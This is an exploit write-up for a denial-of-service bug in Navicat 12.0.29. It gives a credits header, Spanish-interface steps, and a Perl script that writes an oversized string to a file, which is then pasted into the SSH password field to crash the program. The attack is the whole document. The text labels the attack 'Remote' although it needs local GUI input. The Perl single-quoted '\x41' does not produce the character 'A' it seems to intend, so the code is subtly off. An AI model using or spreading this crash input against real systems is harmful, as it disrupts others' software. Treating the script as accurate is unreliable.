# Exploit Title: Navicat 12.0.29 - 'SSH' - Denial of Service - DoS
# Discovery by: Fernando Mengali
# Discovery Date: 22 january 2024
# Vendor Homepage: https://www.navicat.com/es/
# Software Link : https://www.navicat.com/es/download/navicat-premium
# Notification vendor: No reported
# Tested on: Window XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Remote - Denial of Service (DoS)

# How do?
#1 - Run Perl script: perl 24-exploit-perl.pl
#2 - Open exploit.txt and copy content to clipboard
#3 - Open navicat.exe
#4 - Click "Conexion" and select "MySQL..."
#5 - In the "General" tab, give a name to the connection in "Nombre de Conexion" (i. e. conexion1).
#6 - In the "SSH" tab check "Uso de tunel SSH", then set and IP address to the "Host" textbox (i. e. 127.0.0.1) and write down a username in "Nombre de usuario" (i. e. admin).
#7 - Be sure that "Metodo de autentificacion" is set to "Contrasena" and finally paste Clipboard in "Contrasena".
#8 - Click "Aceptar".
#9 - Denied of Service

#!/usr/bin/perl

my $exploit = '\x41' x 5005;

    open(my $file, '>', 'exploit.txt') or die "Cannot open file: $!";
    print $file $exploit;
    close $file;

    print "exploit.txt created! \n";